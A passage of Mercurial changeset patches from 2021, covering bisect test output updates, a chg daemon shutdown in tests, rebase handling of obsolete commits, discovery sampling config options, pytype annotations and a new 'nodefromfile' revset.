2:db07c04beaca (6 changesets remaining, ~2 tests) + Testing changeset 2:db07c04beaca "msg 2" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 4:9b2ba8336a65 (6 changesets remaining, ~2 tests) + Testing changeset 4:9b2ba8336a65 "msg 4" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 1:5cd978ea5149 (6 changesets remaining, ~2 tests) + Testing changeset 1:5cd978ea5149 "msg 1" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -s - Testing changeset 5:7874a09ea728 (6 changesets remaining, ~2 tests) + Testing changeset 5:7874a09ea728 "msg 5" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first bad revision is: @@ -473,17 +473,17 @@ $ hg bisect -r $ hg up -qr tip $ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters" - changeset 31:58c80a7c8a40: good + changeset 31:58c80a7c8a40 tip "msg 31": good abort: cannot bisect (no known bad revisions) [20] $ hg up -qr 0 $ hg bisect --command "\"$PYTHON\" \"$TESTTMP/script.py\" and some parameters" - changeset 0:b99c7b9c8e11: bad - changeset 15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + changeset 0:b99c7b9c8e11 "msg 0": bad + changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -510,13 +510,13 @@ $ hg bisect -r $ hg bisect --good tip --noupdate $ hg bisect --bad 0 --noupdate - Testing changeset 15:e7fa0811edb0 (31 changesets remaining, ~4 tests) + Testing changeset 15:e7fa0811edb0 "msg 15" (31 changesets remaining, ~4 tests) $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" --noupdate - changeset 15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -543,17 +543,17 @@ $ hg bisect -r $ hg up -qr tip $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" - changeset 31:58c80a7c8a40: good + changeset 31:58c80a7c8a40 tip "msg 31": good abort: cannot bisect (no known bad revisions) [20] $ hg up -qr 0 $ hg bisect --command "sh \"$TESTTMP/script.sh\" and some params" - changeset 0:b99c7b9c8e11: bad - changeset 15:e7fa0811edb0: good - changeset 7:03750880c6b5: good - changeset 3:b53bea5e2fcb: bad - changeset 5:7874a09ea728: bad - changeset 6:a3d5c6fdf0d3: good + changeset 0:b99c7b9c8e11 "msg 0": bad + changeset 15:e7fa0811edb0 "msg 15": good + changeset 7:03750880c6b5 "msg 7": good + changeset 3:b53bea5e2fcb "msg 3": bad + changeset 5:7874a09ea728 "msg 5": bad + changeset 6:a3d5c6fdf0d3 "msg 6": good The first good revision is: changeset: 6:a3d5c6fdf0d3 user: test @@ -586,13 +586,13 @@ $ hg bisect --reset $ hg bisect --good 15 $ hg bisect --bad 30 - Testing changeset 22:06c7993750ce (15 changesets remaining, ~3 tests) + Testing changeset 22:06c7993750ce "msg 22" (15 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect --command true - changeset 22:06c7993750ce: good - changeset 26:3efc6fd51aeb: good - changeset 28:8e0c2264c8af: good - changeset 29:b5bd63375ab9: good + changeset 22:06c7993750ce "msg 22": good + changeset 26:3efc6fd51aeb "msg 26": good + changeset 28:8e0c2264c8af "msg 28": good + changeset 29:b5bd63375ab9 "msg 29": good The first bad revision is: changeset: 30:ed2d2f24b11c tag: tip @@ -735,11 +735,11 @@ $ hg bisect --reset $ hg bisect --good . $ hg bisect --bad 25 - Testing changeset 28:8e0c2264c8af (6 changesets remaining, ~2 tests) + Testing changeset 28:8e0c2264c8af "msg 28" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect --command true - changeset 28:8e0c2264c8af: good - changeset 26:3efc6fd51aeb: good + changeset 28:8e0c2264c8af "msg 28": good + changeset 26:3efc6fd51aeb "msg 26": good The first good revision is: changeset: 26:3efc6fd51aeb user: test diff --git a/tests/test-bisect2.t b/tests/test-bisect2.t --- a/tests/test-bisect2.t +++ b/tests/test-bisect2.t @@ -252,7 +252,7 @@ $ hg bisect -r $ hg bisect -g 0 $ hg bisect -b 17 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (15 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (15 changesets remaining, ~3 tests) 0 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -274,16 +274,16 @@ 16:609d82a7ebae $ hg log -q -r 'bisect(ignored)' $ hg bisect -g # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (9 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (9 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (9 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (9 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 8 - Testing changeset 8:dab8161ac8fc (3 changesets remaining, ~1 tests) + Testing changeset 8:dab8161ac8fc "8" (3 changesets remaining, ~1 tests) 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -g # -> update to rev 9 - Testing changeset 9:3c77083deb4a (2 changesets remaining, ~1 tests) + Testing changeset 9:3c77083deb4a "9" (2 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b The first bad revision is: @@ -350,10 +350,10 @@ $ hg bisect -r $ hg bisect -g 18 $ hg bisect -b 1 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (13 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (13 changesets remaining, ~3 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -361,7 +361,7 @@ 6:a214d5d3811a 18:d42e18c7bc9b $ hg bisect -b # -> update to rev 12 - Testing changeset 12:9f259202bbe7 (5 changesets remaining, ~2 tests) + Testing changeset 12:9f259202bbe7 "12" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -381,7 +381,7 @@ 13:b0a32c86eb31 15:857b178a7cf3 $ hg bisect -b # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (3 changesets remaining, ~1 tests) + Testing changeset 13:b0a32c86eb31 "13" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -g The first good revision is: @@ -414,7 +414,7 @@ $ hg bisect -r $ hg bisect -g 1 $ hg bisect -b 16 # -> update to rev 6 - Testing changeset 6:a214d5d3811a (13 changesets remaining, ~3 tests) + Testing changeset 6:a214d5d3811a "merge 4,5" (13 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -422,13 +422,13 @@ 16:609d82a7ebae 17:228c06deef46 $ hg bisect -g # -> update to rev 13 - Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 10 - Testing changeset 10:429fcd26f52d (8 changesets remaining, ~3 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (8 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 12 - Testing changeset 12:9f259202bbe7 (8 changesets remaining, ~3 tests) + Testing changeset 12:9f259202bbe7 "12" (8 changesets remaining, ~3 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -443,10 +443,10 @@ 16:609d82a7ebae 17:228c06deef46 $ hg bisect -g # -> update to rev 9 - Testing changeset 9:3c77083deb4a (5 changesets remaining, ~2 tests) + Testing changeset 9:3c77083deb4a "9" (5 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -s # -> update to rev 15 - Testing changeset 15:857b178a7cf3 (5 changesets remaining, ~2 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(ignored)' $ hg bisect -b @@ -500,13 +500,13 @@ $ hg bisect -r $ hg bisect -g 17 $ hg bisect -b 8 # -> update to rev 10 - Testing changeset 13:b0a32c86eb31 (8 changesets remaining, ~3 tests) + Testing changeset 13:b0a32c86eb31 "13" (8 changesets remaining, ~3 tests) 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 13 - Testing changeset 10:429fcd26f52d (5 changesets remaining, ~2 tests) + Testing changeset 10:429fcd26f52d "merge 6,9" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect -b # -> update to rev 15 - Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -524,7 +524,7 @@ 13:b0a32c86eb31 17:228c06deef46 $ hg bisect -s # -> update to rev 16 - Testing changeset 16:609d82a7ebae (3 changesets remaining, ~1 tests) + Testing changeset 16:609d82a7ebae "16" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(pruned)' 0:33b1f9bc8bc5 @@ -612,7 +612,7 @@ $ hg bisect -r $ hg bisect -b 17 $ hg bisect -g 11 - Testing changeset 13:b0a32c86eb31 (5 changesets remaining, ~2 tests) + Testing changeset 13:b0a32c86eb31 "13" (5 changesets remaining, ~2 tests) 3 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg log -q -r 'bisect(ignored)' 2:051e12f87bf1 @@ -623,7 +623,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect -g - Testing changeset 15:857b178a7cf3 (3 changesets remaining, ~1 tests) + Testing changeset 15:857b178a7cf3 "merge 10,13" (3 changesets remaining, ~1 tests) 3 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg bisect -b The first bad revision is: @@ -665,7 +665,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect --extend - Extending search to changeset 8:dab8161ac8fc + Extending search to changeset 8:dab8161ac8fc "8" 2 files updated, 0 files merged, 2 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' $ hg log -q -r 'bisect(ignored)' @@ -677,7 +677,7 @@ 9:3c77083deb4a 10:429fcd26f52d $ hg bisect -g # dab8161ac8fc - Testing changeset 9:3c77083deb4a (3 changesets remaining, ~1 tests) + Testing changeset 9:3c77083deb4a "9" (3 changesets remaining, ~1 tests) 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 9:3c77083deb4a @@ -757,13 +757,13 @@ $ hg bisect -r $ hg bisect -b 13 $ hg bisect -g 8 - Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests) + Testing changeset 11:82ca6f06eccd "11" (3 changesets remaining, ~1 tests) 2 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 11:82ca6f06eccd 12:9f259202bbe7 $ hg bisect -g 2 - Testing changeset 11:82ca6f06eccd (3 changesets remaining, ~1 tests) + Testing changeset 11:82ca6f06eccd "11" (3 changesets remaining, ~1 tests) 0 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg log -q -r 'bisect(untested)' 11:82ca6f06eccd diff --git a/tests/test-bisect3.t b/tests/test-bisect3.t --- a/tests/test-bisect3.t +++ b/tests/test-bisect3.t @@ -72,13 +72,13 @@ $ hg bisect --good 4 $ hg bisect --good 6 $ hg bisect --bad 12 - Testing changeset 9:2197c557e14c (6 changesets remaining, ~2 tests) + Testing changeset 9:2197c557e14c "9=8+3" (6 changesets remaining, ~2 tests) 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect --bad 10 - Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests) + Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests) 0 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg bisect --skip 7 - Testing changeset 8:e74a86251f58 (4 changesets remaining, ~2 tests) + Testing changeset 8:e74a86251f58 "8" (4 changesets remaining, ~2 tests) 0 files updated, 0 files merged, 0 files removed, 0 files unresolved test template diff --git a/tests/test-template-map.t b/tests/test-template-map.t --- a/tests/test-template-map.t +++ b/tests/test-template-map.t @@ -1606,7 +1606,7 @@ $ hg bisect -g 1 $ hg bisect -b 3 --noupdate - Testing changeset 2:97054abb4ab8 (2 changesets remaining, ~1 tests) + Testing changeset 2:97054abb4ab8 "no person" (2 changesets remaining, ~1 tests) $ hg log -T bisect -r 0:4 changeset: 0:1e4e1b8f71e0 bisect: good (implicit) # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616197003 -3600 # Sat Mar 20 00:36:43 2021 +0100 # Node ID 283828850c56676a65ac30f75a8819760f86147e # Parent f51ff655d338427150ab0fb23fd4c02136cae228 chg: kill trailing comma in SEE ALSO Differential Revision: https://phab.mercurial-scm.org/D10243 diff --git a/contrib/chg/chg.1 b/contrib/chg/chg.1 --- a/contrib/chg/chg.1 +++ b/contrib/chg/chg.1 @@ -36,6 +36,6 @@ .B \-\-kill\-chg\-daemon Terminate the background command servers. .SH SEE ALSO -.BR hg (1), +.BR hg (1) .SH AUTHOR Written by Yuya Nishihara <yuya@tcha.org>. # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1616197077 -3600 # Sat Mar 20 00:37:57 2021 +0100 # Node ID 186c0f6fbc16da9c76318bbfe860ffde1fe3f415 # Parent 283828850c56676a65ac30f75a8819760f86147e tests: ask any chg instance to terminate before looking at sqlite dbs There are spurious errors in CI where the database is still locked, so force the daemon to quit to get deterministic behavior. Since the kill command itself is racy, also sleep 2s to give the server time to wake up and exit. Differential Revision: https://phab.mercurial-scm.org/D10244 diff --git a/tests/test-wireproto-exchangev2-shallow.t b/tests/test-wireproto-exchangev2-shallow.t --- a/tests/test-wireproto-exchangev2-shallow.t +++ b/tests/test-wireproto-exchangev2-shallow.t @@ -176,6 +176,10 @@ updating the branch cache (sent 5 HTTP requests and * bytes; received * bytes in responses) (glob) +#if chg + $ hg --kill-chg-daemon + $ sleep 2 +#endif $ sqlite3 -line client-shallow-1/.hg/store/db.sqlite << EOF > SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC; > EOF @@ -347,6 +351,10 @@ updating the branch cache (sent 5 HTTP requests and * bytes; received * bytes in responses) (glob) +#if chg + $ hg --kill-chg-daemon + $ sleep 2 +#endif $ sqlite3 -line client-shallow-narrow-1/.hg/store/db.sqlite << EOF > SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC; > EOF # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1616180926 25200 # Fri Mar 19 12:08:46 2021 -0700 # Node ID 32399d0813e0eb583bec8ea65c9dd2657af41b77 # Parent 186c0f6fbc16da9c76318bbfe860ffde1fe3f415 rebase: skip obsolete commits even if they have pruned successors Issue 5782 reported that `hg rebase -r <obsolete commit with pruned successor>` failed with an error saying that it would cause divergence. Commit b7e2cf114e85 (rebase: do not consider extincts for divergence detection (issue5782), 2018-02-09) fixed it by letting you rebase the commit. However, that fix seems inconsistent with how we handle `hg rebase -r <pruned commit>`. To me, it should make no difference whether a commit is pruned itself or if it has (only) pruned successors. This patch changes it so we treat these two kinds of commits the same way. I let the message we print remain "note: not rebasing <commit>, it has no successor" even though that last part is not technically correct for commits with pruned successors. I doubt it will confuse users. Differential Revision: https://phab.mercurial-scm.org/D10240 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -361,11 +361,9 @@ ( self.obsoletenotrebased, self.obsoletewithoutsuccessorindestination, - obsoleteextinctsuccessors, ) = _computeobsoletenotrebased(self.repo, obsoleteset, destmap) skippedset = set(self.obsoletenotrebased) skippedset.update(self.obsoletewithoutsuccessorindestination) - skippedset.update(obsoleteextinctsuccessors) _checkobsrebase(self.repo, self.ui, obsoleteset, skippedset) def _prepareabortorcontinue( @@ -2192,13 +2190,9 @@ `obsoletewithoutsuccessorindestination` is a set with obsolete revisions without a successor in destination. - - `obsoleteextinctsuccessors` is a set of obsolete revisions with only - obsolete successors. """ obsoletenotrebased = {} obsoletewithoutsuccessorindestination = set() - obsoleteextinctsuccessors = set() assert repo.filtername is None cl = repo.changelog @@ -2212,11 +2206,8 @@ successors.remove(srcnode) succrevs = {get_rev(s) for s in successors} succrevs.discard(None) - if succrevs.issubset(extinctrevs): - # all successors are extinct - obsoleteextinctsuccessors.add(srcrev) - if not successors: - # no successor + if not successors or succrevs.issubset(extinctrevs): + # no successor, or all successors are extinct obsoletenotrebased[srcrev] = None else: dstrev = destmap[srcrev] @@ -2231,11 +2222,7 @@ if srcrev in extinctrevs or any(s in destmap for s in succrevs): obsoletewithoutsuccessorindestination.add(srcrev) - return ( - obsoletenotrebased, - obsoletewithoutsuccessorindestination, - obsoleteextinctsuccessors, - ) + return obsoletenotrebased, obsoletewithoutsuccessorindestination def abortrebase(ui, repo): diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete.t --- a/tests/test-rebase-obsolete.t +++ b/tests/test-rebase-obsolete.t @@ -1294,18 +1294,16 @@ o 0:b173517d0057 a $ hg rebase -d 0 -r 2 - rebasing 2:a82ac2b38757 c "c" + note: not rebasing 2:a82ac2b38757 c "c", it has no successor $ hg log -G -r 'a': --hidden - o 5:69ad416a4a26 c + * 4:76be324c128b d | - | * 4:76be324c128b d + | x 3:ef8a456de8fa c1 (pruned) | | - | | x 3:ef8a456de8fa c1 (pruned) - | | | - | x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa rewritten using rebase as 5:69ad416a4a26) - | |/ - | o 1:488e1b7e7341 b + x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) |/ + o 1:488e1b7e7341 b + | o 0:b173517d0057 a $ cd .. # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616002850 -3600 # Wed Mar 17 18:40:50 2021 +0100 # Node ID 13d973690ecd1f3cde7c2f96a23267eedecf5ab9 # Parent 32399d0813e0eb583bec8ea65c9dd2657af41b77 debugdiscovery: document relevant config option These config option are here for people to experiment with it. So lets document them in the command that is used for experimentation. Differential Revision: https://phab.mercurial-scm.org/D10231 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1011,6 +1011,35 @@ be "replaced" by a subset of the local repository using the `--local-as-revs` flag. This is useful to efficiently debug pathological discovery situation. + + The following developer oriented config are relevant for people playing with this command: + + * devel.discovery.exchange-heads=True + + If False, the discovery will not start with + remote head fetching and local head querying. + + * devel.discovery.grow-sample=True + + If False, the sample size used in set discovery will not be increased + through the process + + * devel.discovery.grow-sample.rate=1.05 + + the rate at which the sample grow + + * devel.discovery.randomize=True + + If andom sampling during discovery are deterministic. It is meant for + integration tests. + + * devel.discovery.sample-size=200 + + Control the initial size of the discovery sample + + * devel.discovery.sample-size.initial=100 + + Control the initial size of the discovery for initial change """ opts = pycompat.byteskwargs(opts) unfi = repo.unfiltered() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616004628 -3600 # Wed Mar 17 19:10:28 2021 +0100 # Node ID f165105400d00ed790fb2cacebd37f076bfcf423 # Parent 13d973690ecd1f3cde7c2f96a23267eedecf5ab9 setdiscovery: rearrange code deciding if we will grow the sample The new code is clearer and will make the next update simpler. Differential Revision: https://phab.mercurial-scm.org/D10232 diff --git a/mercurial/setdiscovery.py b/mercurial/setdiscovery.py --- a/mercurial/setdiscovery.py +++ b/mercurial/setdiscovery.py @@ -429,13 +429,12 @@ # full blown discovery # if the server has a limit to its arguments size, we can't grow the sample. - hard_limit_sample = remote.limitedarguments grow_sample = local.ui.configbool(b'devel', b'discovery.grow-sample') - hard_limit_sample = hard_limit_sample and grow_sample + grow_sample = grow_sample and not remote.limitedarguments randomize = ui.configbool(b'devel', b'discovery.randomize') disco = partialdiscovery( - local, ownheads, hard_limit_sample, randomize=randomize + local, ownheads, not grow_sample, randomize=randomize ) if initial_head_exchange: # treat remote heads (and maybe own heads) as a first implicit sample @@ -454,7 +453,7 @@ ui.debug(b"taking initial sample\n") samplefunc = disco.takefullsample targetsize = fullsamplesize - if not hard_limit_sample: + if grow_sample: fullsamplesize = int(fullsamplesize * samplegrowth) else: # use even cheaper initial sample # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616004360 -3600 # Wed Mar 17 19:06:00 2021 +0100 # Node ID 2b1b8f3e6510b9f7923372fd6d26820885a52edf # Parent f165105400d00ed790fb2cacebd37f076bfcf423 setdiscovery: add a discovery.grow-sample.dynamic option The current discovery dynamically adapt to complex situations. This makes it quick and effective, but also harder so study the effects of other improvements in such complex situation. So we add a new option to control this too. Differential Revision: https://phab.mercurial-scm.org/D10233 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -737,6 +737,14 @@ b'discovery.grow-sample', default=True, ) +# When discovery.grow-sample.dynamic is True, the default, the sample size is +# adapted to the shape of the undecided set (it is set to the max of: +# <target-size>, len(roots(undecided)), len(heads(undecided) +coreconfigitem( + b'devel', + b'discovery.grow-sample.dynamic', + default=True, +) # discovery.grow-sample.rate control the rate at which the sample grow coreconfigitem( b'devel', diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1024,6 +1024,12 @@ If False, the sample size used in set discovery will not be increased through the process + * devel.discovery.grow-sample.dynamic=True + + When discovery.grow-sample.dynamic is True, the default, the sample size is + adapted to the shape of the undecided set (it is set to the max of: + <target-size>, len(roots(undecided)), len(heads(undecided) + * devel.discovery.grow-sample.rate=1.05 the rate at which the sample grow diff --git a/mercurial/setdiscovery.py b/mercurial/setdiscovery.py --- a/mercurial/setdiscovery.py +++ b/mercurial/setdiscovery.py @@ -429,12 +429,16 @@ # full blown discovery # if the server has a limit to its arguments size, we can't grow the sample. - grow_sample = local.ui.configbool(b'devel', b'discovery.grow-sample') + configbool = local.ui.configbool + grow_sample = configbool(b'devel', b'discovery.grow-sample') grow_sample = grow_sample and not remote.limitedarguments + dynamic_sample = configbool(b'devel', b'discovery.grow-sample.dynamic') + hard_limit_sample = not (dynamic_sample or remote.limitedarguments) + randomize = ui.configbool(b'devel', b'discovery.randomize') disco = partialdiscovery( - local, ownheads, not grow_sample, randomize=randomize + local, ownheads, hard_limit_sample, randomize=randomize ) if initial_head_exchange: # treat remote heads (and maybe own heads) as a first implicit sample # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616108241 14400 # Thu Mar 18 18:57:21 2021 -0400 # Node ID 9ff4672c8c26df3f7134d738cd771a7e35b85aac # Parent 2b1b8f3e6510b9f7923372fd6d26820885a52edf revlog: convert an Abort message to bytes Flagged by pytype. Differential Revision: https://phab.mercurial-scm.org/D10234 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -3250,7 +3250,7 @@ # rewriting entries that already have sidedata is not # supported yet, because it introduces garbage data in the # revlog. - msg = "Rewriting existing sidedata is not supported yet" + msg = b"Rewriting existing sidedata is not supported yet" raise error.Abort(msg) entry = entry[:8] entry += (current_offset, len(serialized_sidedata)) # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616125260 14400 # Thu Mar 18 23:41:00 2021 -0400 # Node ID 2c0e35f6957abab074d2a96ab4e1dbc58349b3e2 # Parent 9ff4672c8c26df3f7134d738cd771a7e35b85aac typing: mark the argument to mercurial.i18n.gettext() non-Optional Few if any of the callers are handling a `None` return, which is making pytype complain. I tried adding @overload definitions to indicate the bytes -> bytes and None -> None relationship, but pytype doesn't seem to apply that to `_()` through the function assignment. What did work was to change `_()` into its own function that called `gettext()`, but that has an extra function call overhead. Even putting that function into an `if pycompat.TYPE_CHECKING` block and leaving the existing assignments in the `else` block caused pytype to lose track of the @overloads. At that point, I simply gave up. PyCharm doesn't like that it can return None, given the new type hints, but pytype doesn't complain about this nor does it see any callers passing None. The most important thing here is to catch str being passed anyway. Differential Revision: https://phab.mercurial-scm.org/D10235 diff --git a/mercurial/i18n.py b/mercurial/i18n.py --- a/mercurial/i18n.py +++ b/mercurial/i18n.py @@ -23,7 +23,6 @@ from typing import ( Callable, List, - Optional, ) @@ -71,7 +70,7 @@ def gettext(message): - # type: (Optional[bytes]) -> Optional[bytes] + # type: (bytes) -> bytes """Translate message. The message is looked up in the catalog to get a Unicode string, # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1616128110 14400 # Fri Mar 19 00:28:30 2021 -0400 # Node ID b26f9560f40d53ec9a8afa912265754662b32b16 # Parent 2c0e35f6957abab074d2a96ab4e1dbc58349b3e2 commands: necessary annotations and assertions to pass pytype This is a slightly less forceful incarnation of D7384, where pytype can be appeased with some assertions rather than disabling warnings. Differential Revision: https://phab.mercurial-scm.org/D10236 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -76,6 +76,12 @@ stringutil, ) +if pycompat.TYPE_CHECKING: + from typing import ( + List, + ) + + table = {} table.update(debugcommandsmod.command._table) @@ -3295,7 +3301,8 @@ ) # checking that newnodes exist because old state files won't have it elif statedata.get(b'newnodes') is not None: - statedata[b'newnodes'].append(node) + nn = statedata[b'newnodes'] # type: List[bytes] + nn.append(node) # remove state when we complete successfully if not opts.get(b'dry_run'): @@ -7268,6 +7275,12 @@ dest = dbranch = dother = outgoing = None if opts.get(b'remote'): + # Help pytype. --remote sets both `needsincoming` and `needsoutgoing`. + # The former always sets `sother` (or raises an exception if it can't); + # the latter always sets `outgoing`. + assert sother is not None + assert outgoing is not None + t = [] if incoming: t.append(_(b'1 or more incoming')) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1616007995 -3600 # Wed Mar 17 20:06:35 2021 +0100 # Node ID 56d441256e82837d0ed7d1a834a9181a6af570d3 # Parent b26f9560f40d53ec9a8afa912265754662b32b16 revset: introduce a `nodefromfile` revset I though we had one, but actually we don't seem to. So here is a revset to reuse a list of node previously stored. Differential Revision: https://phab.mercurial-scm.org/D10230 diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1335,6 +1335,29 @@ return subset & rs +@predicate(b'nodefromfile(path)') +def nodefromfile(repo, subset, x): + """ + An alias for ``::.`` (ancestors of the working directory's first parent). + If file pattern is specified, the histories of files matching given + pattern in the revision given by startrev are followed, including copies. + """ + path = getstring(x, _(b"nodefromfile require a file path")) + listed_rev = set() + try: + with pycompat.open(path, 'rb') as f: + for line in f: + n = line.strip() + rn = _node(repo, n) + if rn is not None: + listed_rev.add(rn) + except IOError as exc: + m = _(b'cannot open nodes file "%s": %s') + m %= (path, encoding.strtolocal(exc.strerror)) + raise error.Abort(m) + return subset & baseset(listed_rev) + + @predicate(b'all()', safe=True) def getall(repo, subset, x): """All changesets, the same as ``0:tip``.""" @@ -1697,13 +1720,9 @@ return subset & names -@predicate(b'id(string)', safe=True) -def node_(repo, subset, x): - """Revision non-ambiguously specified by the given hex string prefix.""" - # i18n: "id" is a keyword - l = getargs(x, 1, 1, _(b"id requires one argument")) - # i18n: "id" is a keyword - n = getstring(l[0], _(b"id requires a string")) +def _node(repo, n): + """process a node input""" + rn = None if len(n) == 40: try: rn = repo.changelog.rev(bin(n)) @@ -1712,7 +1731,6 @@ except (LookupError, TypeError): rn = None else: - rn = None try: pm = scmutil.resolvehexnodeidprefix(repo, n) if pm is not None: @@ -1721,6 +1739,17 @@ pass except 